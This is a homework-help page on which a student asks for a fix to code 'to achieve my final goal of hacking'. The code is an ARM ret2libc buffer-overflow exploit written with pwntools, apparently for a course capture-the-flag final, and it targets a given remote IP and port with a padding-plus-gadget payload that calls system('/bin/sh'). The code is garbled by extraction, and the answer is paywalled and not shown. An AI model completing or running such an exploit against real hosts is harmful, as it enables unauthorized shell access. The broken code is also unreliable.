Answered step by step
Verified Expert Solution
Question
1 Approved Answer
Can you correct the code to achieve my final goal of hacking by using the information? context. update( loglevel='debug', arch=' arm, bits='32', os='linux' ) def
Can you correct the code to achieve my final goal of hacking by using the information?
context. update( loglevel='debug', arch=' arm, bits='32', os='linux' ) def main( ): p=process([ 'qemu-arm', '-L', '/usr/arm-linux-gnueabi', './final' ] ) p= remote ("35.224.75.211", 9999) binary = ELF("./final_remote") libc_start =03fe66000 offset_pop_re_pc =000122b94 pop_r _pc_addr =libc_start+ offset_pop_r _pc libc =ELF("/usr/arml inux-gnueabi/lib/libc.so.6") offset_system = libc.symbols['system'] log. info("system offset is: 0x%x, offset_system) system_addr =libc_start+offset_system offset bin sh =next( libc search(b/bin/sh\0)) log. info("bin_sh offset is: 0x96x, offset_bin_sh) bin_sh_addr =libc_start+offset_bin_sh log. in f ("system_addr is: x,system addr) log. info( "bin_sh_addr is: xx, bin_sh_addr) payload =bA140 payload += p32(pop_r0_pc_addr) payload += p32(bin_sh_addr) payload += p32(system_addr) f= open( "armshell", "wb") f. write(navinad) Server Details for Final Project - Target IP: 35.224.75.211 - Target Port: 9999 - Vulnerable program: final_remote - Target File (flag): flag.txt - Security Measures: ASLR is Off, NX is on - Libc Info: Libc library has been loaded at 0x3fe66000 on the remote server - Gadget Info: check class website, "Gadget Information" for remote libc gadgetsStep by Step Solution
There are 3 Steps involved in it
Step: 1
Get Instant Access to Expert-Tailored Solutions
See step-by-step solutions with expert insights and AI powered tools for academic success
Step: 2
Step: 3
Ace Your Homework with AI
Get the answers you need in no time with our AI-driven, step-by-step assistance
Get Started